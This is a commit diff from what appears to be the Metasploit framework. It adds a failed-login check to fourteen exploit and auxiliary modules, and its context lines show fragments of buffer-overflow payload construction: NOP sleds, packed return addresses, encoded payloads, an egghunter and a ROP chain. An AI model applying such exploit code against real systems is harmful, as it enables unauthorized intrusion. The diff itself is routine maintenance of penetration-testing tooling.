bug/bundler_fix
jvazquez-r7 2013-06-18 10:00:44 -05:00
commit 9e3053f24d
14 changed files with 28 additions and 15 deletions

View File

@ -54,7 +54,8 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
connect_login
c = connect_login
return if not c
path = datastore['TRAVERSAL'] + datastore['PATH']

View File

@ -91,7 +91,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']

View File

@ -70,7 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded

View File

@ -47,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")

View File

@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
buf = make_nops(3047)
buf[2043, 4] = [ target.ret ].pack('V')

View File

@ -173,7 +173,8 @@ For now, that will have to be done manually.
end
# proceed with chosen target...
connect_login
c = connect_login
return if not c
# '<ip>\n PWD '
ip_length = Rex::Socket.source_address(datastore['RHOST']).length

View File

@ -76,7 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")

View File

@ -67,7 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
connect_login
c = connect_login
return if not c
eggoptions =
{

View File

@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")

View File

@ -52,7 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")

View File

@ -145,7 +145,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("Selected Target: #{my_target.name}")
connect_login
c = connect_login
return if not c
rop_chain = create_rop_chain(target['ver'])
rop = rop_chain.unpack('C*').join(',')

View File

@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
sploit = "/" + make_nops(525 - payload.encoded.length)
sploit << payload.encoded + [target.ret].pack('V')

View File

@ -62,7 +62,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")

View File

@ -56,7 +56,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
connect_login
c = connect_login
return if not c
print_status("Trying target #{target.name}...")